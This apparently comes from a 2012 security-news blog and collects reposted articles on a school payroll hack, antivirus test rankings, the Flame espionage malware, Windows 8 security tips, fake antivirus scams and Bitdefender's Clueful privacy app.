Saturday, December 1, 2012

Hacker attack siphons off $150,000 in teacher salaries from payroll systems

Hackers used the American Thanksgiving holiday to launch a crafty attack against a local school district in the state of Wisconsin, compromising a direct deposit system, and stealing $150,000 intended for teachers.

Administrators in the Stanley-Boyd school district in the western part of Wisconsin were alerted to the attack by their bank on November 21, according to a report in the Chippewa Herald.

According to the newspaper, the attackers compromised the district's network and altered its direct deposit file, supplanting employee bank account information with accounts belonging to the attackers.

AnchorBank, based in Madison, Wisconsin, noticed the unusual activity and alerted the district. The district has notified the FBI, which is investigating.

In the meantime, AnchorBank said it had been able to retrieve a portion of the stolen payroll as of November 27, and believed it could recover most of the lost funds.

Hacking school districts isn't about changing grades "War Games"-style.

(Though that still happens, too!) .

Rather, school districts and municipalities are a prime target for cybercriminal gangs, many based outside the United States.

Hackers are attracted to the small towns because they often are short on IT security expertise, but have easy access to cash through bank accounts and lines of credit. Beyond that, the decentralized nature of many municipal operations can make detection difficult.

In just the latest incident, in October, the town of Burlington, Washington, disclosed that hackers had compromised a number of town systems used to operate an online utility billing system and stolen $400,000 from a city bank account.

Article Source

How Much Do Antivirus Rankings Matter to You?

German antivirus lab AV-Test recently tested several security suites. Most of them declined since a few months ago, particularly Microsoft Security Essentials, our favorite Windows antivirus app. We still love it, but the recent AV-Test makes us wonder: How much do these ratings matter to you?

Microsoft Security Essentials was half a point shy of passingthe AV-Test, due to problems detecting zero-day threats. Other recent tests by AV Comparatives were better, but still mixed. That said, Microsoft Security Essentials has never been the top ranker in these tests (usually the top spots are the paid security suites), but it's something worth pondering.

What do you think? Does it matter to you?

Sunday, October 14, 2012

The Antivirus Era Is Over

Two weeks ago today, computer security labs in Iran, Russia, and Hungary announced the discovery of Flame, "the most complex malware ever found," according to Hungary's CrySyS Lab.

For at least two years, Flame has been copying documents and recording audio, keystrokes, network traffic, and Skype calls, and taking screenshots from infected computers. That information was passed along to one of several command-and-control servers operated by its creators. In all that time, no security software raised the alarm.

Flame is just the latest in a series of incidents that suggest that conventional antivirus software is an outmoded way of protecting computers against malware. "Flame was a failure for the antivirus industry," Mikko Hypponen, the founder and chief research officer of antivirus firm F-Secure, wrote last week. "We really should have been able to do better. But we didn't. We were out of our league, in our own game."

The programs that are the lynchpin of computer security for businesses, governments, and consumers alike operate like the antivirus software on consumer PCs. Threats are detected by comparing the code of software programs and their activity against a database of "signatures" for known malware. Security companies such as F-Secure and McAfee constantly research reports of new malware and update their lists of signatures accordingly. The result is supposed to be an impenetrable wall that keeps the bad guys out.

However, in recent years, high-profile attacks on not just the Iranian government but also the U.S. government have taken place using software that, like Flame, was able to waltz straight past signature-based software. Many technically sophisticated U.S. companies—including Google and the computer security firm RSA—have been targeted in similar ways, albeit with less expensive malware, for their corporate secrets. Smaller companies are also routinely compromised, experts say.

Some experts and companies now say it's time to demote antivirus-style protection. "It's still an integral part [of malware defense], but it's not going to be the only thing," says Nicolas Christin, a researcher at Carnegie Mellon University. "We need to move away from trying to build Maginot lines that look bulletproof but are actually easy to get around."

Both Christin and several leading security startups are working on new defense strategies to make attacks more difficult, and even enable those who are targeted to fight back.

"The industry has been wrong to focus on the tools of the attackers, the exploits, which are very changeable," says Dmitri Alperovitch, chief technology officer and cofounder of CrowdStrike, a startup in California founded by veterans of the antivirus industry that has received $26 million in investment funding. "We need to focus on the shooter, not the gun—the tactics, the human parts of the operation, are the least scalable."

CrowdStrike isn't ready to go public with details of its technology, but Alperovitch says the company plans to offer a kind of intelligent warning system that can spot even completely novel attacks and trace their origins.

This type of approach is possible, says Alperovitch, because, although an attacker could easily tweak the code of a virus like Flame to evade antivirus scanners once more, he or she would still have the same goal: to access and extract valuable data. The company says its technology will rest on "big data," possibly meaning it will analyze large amounts of data related to many traces of activity on a customer's system to figure out which could be from an infiltrator.

Christin, of Carnegie Mellon, who has recently been investigating the economic motivations and business models of cyber attackers, says that makes sense. "The human costs of these sophisticated attacks are the one of the largest," he says. Foiling an attack is no longer a matter of neutralizing a chunk of code from a lone genius, but of defeating skilled groups of people. "You need experts in their field that can also collaborate with others, and they are rare," says Christin. Defense software that can close off the most common tactics makes it even harder for attackers, he says.

Other companies have begun talking in similar terms. "It goes back to that '80s law enforcement slogan: 'Crime doesn't pay,' " says Sumit Agarwal, a cofounder of Shape Security, another startup in California that recently came out of stealth mode. The company has $6 million in funding from ex-Google CEO Eric Schmidt, among others. Agarwal's company is also keeping quiet about its technology, but it aims to raise the cost of a cyber assault relative to the economic payoff, thus making it not worth the trouble to carry out.

A company with a similar approach is Mykonos Software, which developed technology that helps protect websites by wasting hackers' time to skew the economics of an attack. Mykonos was bought by networking company Juniper earlier this year.

Antivirus companies have been quick to point out that Flame was no ordinary computer virus. It came from the well-resourced world of international espionage. But such cyberweapons cause collateral damage (the Stuxnet worm targeted at the Iranian nuclear program actually infected an estimated 100,000 computers), and features of their designs are being adopted by criminals and less-resourced groups.

"Never have so many billions of dollars of defense technology flowed into the public domain," says Agarwal of Shape Security. While the U.S. military goes to extreme lengths to prevent aircraft or submarines from falling into the hands of others, military malware such as Flame or Stuxnet is out there for anyone to inspect, he says.

Agarwal and Alperovitch of CrowdStrike both say the result is a new class of malware being used against U.S. companies of all sizes. Alperovitch claims to know of relatively small law firms being attacked by larger competitors, and green technology companies with less than 100 employees having secrets targeted.

Alperovitch says his company will enable victims to fight back, within the bounds of the law, by also identifying the source of attacks. "Hacking back would be illegal, but there are measures you can take against people benefiting from your data that raise the business costs of the attackers," he says. Those include asking the government to raise a case with the World Trade Organization, or going public with what happened to shame perpetrators of industrial espionage, he says.

Research by Christin and other academics has shown that chokepoints do exist that could allow relatively simple legal action to neutralize cybercrime operations. Christin and colleagues looked into scams that manipulate search results to promote illicit pharmacies and concluded that most could be stopped by clamping down on just a handful of services that redirect visitors from one Web page to another. And researchers at the University of California, San Diego, showed last year that income from most of the world's spam passes through just three banks. "The most effective intervention against spam would be to shut down those banks, or introduce new regulation," says Christin. "These complex systems often have concentrated points on which you can focus and make it very expensive to carry out these attacks."

But Agarwal warns that even retribution within the law can be ill-judged: "Imagine you're a large company and accidentally swim into the path of the Russian mafia. You can stir up a larger problem than you intended."

Saturday, September 29, 2012

Top Eight Security Tips for Windows 8

Microsoft is releasing Windows 8, the newest version of the Windows operating system, for general availability on October 26. Although Windows 8 offers enhanced security features, it also raises new security concerns because of changes to the graphical user interface and a new online app store. We’re offering the following eight security tips to help you stay secure as you move to Windows 8.

1. Exercise caution with apps for the new Windows 8 user interface (formerly known as Metro)

Some familiar applications have been completely re-written for the new Windows 8 UI. As a result they may work completely differently, despite looking the same. For example, an application historically delivered as an executable could now be entirely web-based. This impacts the visibility your existing security and monitoring tools have into these apps.

2. Use the Windows 8 style UI version of Internet Explorer

By default, plugins are disabled, blocking a major target for exploit kits and Blackhole attacks.

3. Make sure your security vendor can flag malicious Windows 8 UI apps

Windows 8 UI apps have important differences from regular applications, and your security product should be able to distinguish the two. The security product should correctly flag malicious or modified Windows 8 UI applications (tampered, modified, invalid license).

4. Disable hard drive encryption hibernation

Hard drive encryption is a cornerstone of data protection. If possible, disable the hibernation option in Windows 8 through group policy, as it doesn’t always work well with encryption.

5. Make sure your hardware carries the “Designed for Windows 8” logo

To carry this logo, hardware must be UEFI compliant. This means you can take advantage of the secure boot functionality available in Windows 8. Secure boot is designed to ensure the pre-OS environment is secure in order to minimize the risk from boot loader attacks.

6. Make application control a priority

The Windows 8 app store makes application control increasingly important for both malware prevention and productivity control. While the Windows Store will be secured, history shows that malicious apps are likely to slip through. Disable the use of apps that aren’t relevant to your organization.

7. Treat Windows RT (ARM) devices like any other mobile devices

Make sure you impose the same security levels on Windows RT devices as all others. You should have the ability to control, track, remote wipe and encrypt them.

8. Review application permissions in the Windows Store

Applications in the Windows Store must list any resources they require. Carefully review these permissions in the details tab as some will grant access by default to your location information, calendar, etc.

You should still run a full security suite for superior filtering and centralized management and reporting. While Microsoft has included a minimalist antivirus and firewall, most organizations will still require commercial-grade security. And of course, all the old security rules also apply with Window 8. It’s still a bad idea to allow automatic log-on. Above all, remain vigilant.

Monday, September 3, 2012

‘Flame’ Virus explained: How it works and who’s behind it

Flame may be the most powerful computer virus in history, and a nation-state is most likely to blame for unleashing it on the World Wide Web.Kaspersky's chief malware expert Vitaly Kamlyuk shared with RT the ins and outs of Stuxnet on steroids.

Iran appears to be the primary target of the data-snatching virus that has swept through the Middle East, though other countries have also been affected.The sheer complexity of the virus and its targets has led Moscow-based Kaspersky Lab to believe a state is behind the attack.

Kaspersky first spotted the virus in 2010, though it may have been wrecking havoc on computer systems for many years.Vitaly Kamlyuk told RT how his company discovered it, just what makes Flame so significant, features of the virus that could point towards its creator, and why we all lose out in this intensifying cyber-war.

RT: So, how did you spot the malware, was it a planned investigation, or did it come by surprise?

Vitaly Kamlyuk: It was by surprise. We were initially searching for a [different form of] malware. We were aware of the malware that had spread throughout the Middle East, attacked hundreds of computers and wiped their hard drives, making the systems unbootable after that. It was actually after an inquiry from the International Telecommunications Union, which is a part of the United Nations, who actually asked us to start conducting research. When we started looking for this mysterious malware in the Middle East, we discovered this suspicious application that turned out to be even more interesting than the initial target of our search.

RT: According to one of your experts, 'Flame' does not appear to cause physical damage, so why has it been dubbed the most hazardous cyber-attacks in history?

VK: It’s actually on the same level as the notoriously known Stuxnet and Duqu [attacks], because we suspect that there is a nation state behind the development of this cyber attack, and there are reasons for that. This application doesn’t fit into any of the existing groups of developed cyber attack tools. There are currently three groups. There are traditional cyber criminals who are hunting users’ data (like log-ins and passwords) to access bank accounts over the Internet and steal money, send spam, or conduct dubious attacks.This [Flame] doesn’t fit into the group of traditional cyber criminal malware. Also, it doesn’t fit into the activists’ malware who are using typically free and open source tools to attack computers on the Internet. And the third known group [at this time] is nation-states.

RT: What makes this malware different from all other Spyware programs and what damage can it do?

VK: It’s pretty advanced – one of the most sophisticated [examples of] malware we’ve ever seen. Even its size – it’s over 20 megabytes if you sum up all the sizes of the modules that are part of the attacking toolkit. It’s very big compared to Stuxnet, which was just hundreds of kilobytes of code: it’s over 20 megabyes. And the Stuxnet analysis took us several months, so you can imagine that a full analysis of this threat may take us up to a year. So we think it is one of the most sophisticated malware [programs] out there.

It’s also quite unique in the way it steals information. It’s possible to steal different types of information with the help of this spyware tool. It can record audio if a microphone is attached to the infected system, it can do screen captures and transmit visual data. It can steal information from the input boxes when they are hidden behind asterisks, password fields; it can get information from there.Also it can scan for locally visible Bluetooth devices if there is a Bluetooth adapter attached to the local system.

RT: Is there a connection between this new cyber threat and previous large-scale virus attacks?

VK: We are trying to compare and find similarities between this development and previous [ones] of course, but there are so few of them – Stuxnet or Duqu mostly. There is no reliable relation between Stuxnet and Flame as we call it…they are completely different. Because Stuxnet was a small application developed for a particular target with the specific objective to interact with industrial control systems and break them down. And Flame is a universal attacking tool kit used mostly for cyber espionage. So there are so things that [Flame] shares in common with Stuxnet and Duqu, and these are the vulnerabilities that are used by both [types of] malware. Probably one malware simply copied vulnerabilities from the other malware program when they were published.

RT: So this means that cyber warfare is evolving rapidly, and 'Flame' vividly confirms this trend. Can less technologically developed nations resist such attacks, or is it game over for them?

VK: It’s never game over in this area, because even if the country isn’t technologically developed in this area, it doesn’t prevent them from cooperating with organizations like ours and with private companies in the security industry that can provide them with valuable pieces of information which can actually result in the discovery of such threats. And when we discover such threats, we permanently add them to antivirus databases, and users from those nations can use freely available trial tools and commercial antivirus [software] to protect their systems.

RT: This enormous stratum of data that 'Flame' can gather, who would need it and is it really possible to analyze such an avalanche of information?

VK: First of all, when we’re talking about the size of data that is to be analyzed, we know that the attackers do not infect as many victims as possible. Their resources are limited; it seems that they understand that. They are keeping the number of infected machines more or less the same. So it’s the same level. When they finish analyzing data that has been stolen from one network, they remove the malware and switch to another.So we think that it’s still possible the extract only the data they are interested in.

RT: So can we call this a cyber war, and if so?

VK: Stuxnet and Duqu were bright examples of cyber weapons which could even physically destroy infrastructure, and this [Flame] is a continuation of this story. So this is another development in this roe which continues in addition to Stuxnet and Duqu.There are also nation stations supporting [these] developments. We think that cyber warfare has been going on for years already. People were just probably not aware of it because cyber warfare has a unique feature: it’s hidden. Nobody knows when cyber warfare operations are going on. This is the key feature of it.

RT: Who is behind these cyber attacks?

VK: Like with Stuxnet and Duqu, it’s currently unclear who is behind it. It’s very hard to find out who is behind it because when we try to follow the traces, who controls the application – it connects to the command and control centers – it turns out to be… dozens or even more servers spread around different countries around the world. More than 80 or 90 domains are associated with those servers. Most of them are registered with fake identities. So they’re pretty well protected and hidden. So it is unclear who is behind that, and we try not to speculate who could be behind such attacks. We try to base it on pure facts like the language we extract from the code. In this case, we only found traces of good English used inside the code.

RT: So who do you think is winning this war?

VK: I think that humanity is losing to be honest, because we are fighting between each other instead of fighting against global problems which everyone faces in their lives.

Article Source

Sunday, September 2, 2012

Fake antiviruses

Basic description

Fake antivirus software is a scam commonly used by malicious software creators in order to sell fake security software to unwitting victims. The scam will typically involve a webpage or pop-up that informs the user they have viruses or other malware on their computer, even though they do not. It then offers to clean the infection. When the user opts to clean up they are required to pay to obtain a version of the fake software the will perform the cleanup. After the victim pays the software may or may not cease the fake warnings.

Technical detail

Fake antivirus, also known as rogue antivirus or scareware, is one of the leading ways for malicious hackers to make money from unsuspecting Internet users. The fake antivirus software typically warns the user that they have various fictional security threats present on their computer. The warnings themselves are false but they are often backed up by believable descriptions of the supposed malware.

When the user chooses to remove the threats they are asked to purchase or register the product and taken to a website that will process the payment details.
The webpages that users are taken to may look like one of these:

Fake antivirus is spread using a variety of methods, all designed to draw an unsuspecting user into installing the software.

Email and messaging
Criminals send spam email and social network messages with the software installer attached, using a social engineering lure to persuade the recipient to open the attachment. Common lures include tax refund information, package delivery notifications or pictures of topical news stories.

Search engine poisoning
Hackers create pages related to common or topical search terms and design them to appear high in search engine results. This makes it likely that people will encounter the page during their usual search activity. The webpages may either display warnings about infection that encourage the user to purchase the fake antivirus, or they download a video player which is actually the fake antivirus installer.

Compromised websites
Cybercriminals often break into other websites in order to spread their software, relying on the site's popularity to draw innocent users. The hackers will then install extra code into the compromised pages, again with the goal of either displaying fake security warnings or exploiting a browser vulnerability to install their software directly. Cybercriminals will often combine these techniques to increase the effectiveness of their fraud.

The fake antivirus software makers use a variety of names for their software to make it appear legitimate. Examples of these names include:
Antivirus Plus
Antivirus Soft
Antivirus XP
Smart Internet Protection
Security Defender

Some will also steal the names of legitimate security software.

Article Source

Friday, August 31, 2012

Bitdefender Relaunches Clueful as Free Social Web-Guide on iOS App Behavior

Former iOS Privacy App made available again with more features for consumers to learn how Apps treat their data and privacy

Bitdefender, the award-winning provider of innovative antivirussolutions, today announced the relaunch of Clueful, the first security application to empower iPhone owners to distinguish privacy violating apps. Replacing the controversially removed iOS App Store version, Clueful returns as a free web-app globally.

 Available for free at via iPhones, iPads and PCs alike, the new Clueful adds more features and more vital privacy information for users. Users are informed of Apps that are careless with usernames and passwords, track location, read and use address books, access calendars, drain a device’s battery, overly target users with ads, don't encrypt personal data or transmissions, track and aggregate the owner’s usage through multiple analytics networks, and more.

Alongside access to Top App listing information, users can now add comments on any App’s clue card and comment on how developers handle their privacy.

“The iPhone is the most personal of your personal devices, storing large amounts of private information that app developers would love to access. We feel Clueful is one of the most useful and valuable tools available to consumers and are excited to relaunch it,” said Bitdefender’s Chief Security Researcher, Catalin Cosoi. “We’re putting Clueful out as a comprehensive, full-featured guide to iOS apps with added social features and are preparing further advances for this new technology. There will be much more about Clueful coming soon.”

Bitdefender®, the award-winning provider of innovative antivirussolutions, continues to work with Apple to bringing the initially approved and later pulled Clueful back on the App Store.


Article Source